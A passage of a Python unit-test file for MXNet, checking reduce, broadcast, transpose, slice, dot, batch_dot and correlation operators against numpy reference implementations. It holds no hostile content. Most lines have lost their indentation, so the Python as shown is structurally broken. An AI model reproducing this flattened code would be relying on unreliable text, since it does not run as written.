_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
            # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for i in range(sample_num):
        # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
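    # The permutations generated below move one contiguous block of axes, the pattern a pseudo-2D transpose path is meant to cover, across several dtypes.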
def getTwoInts(mn, mx):
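        # Return two distinct integers drawn from [mn, mx), sorted in ascending order.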
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]:  # for convenience of testing, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
    target_shape = (28, 28)
    src_shape = (42, 42)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
    data_array = np.zeros((1, 1) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
    executor.backward(mx.nd.ones((1, 1) + target_shape))
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
                    if ndim == 1 and k != 1:
                        continue  # skip invalid (1-D, k != 1) combinations instead of silently falling through
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
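    # Numpy reference for the Correlation forward pass; also returns the zero-padded inputs so the backward reference can reuse them.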
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
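    # e.g. the (1, 3, 10, 10) case below with pad_size=4, kernel_size=1, max_displacement=4, stride1=stride2=1 gives an 18x18 padded input, border_size=4 and a 10x10 output with 9*9=81 channels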
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
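    # Numpy reference for the Correlation gradients w.r.t. both inputs, cropped back to the unpadded input shapes.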
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
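    # Compare the MXNet Correlation operator with the numpy reference, forward and backward.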
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
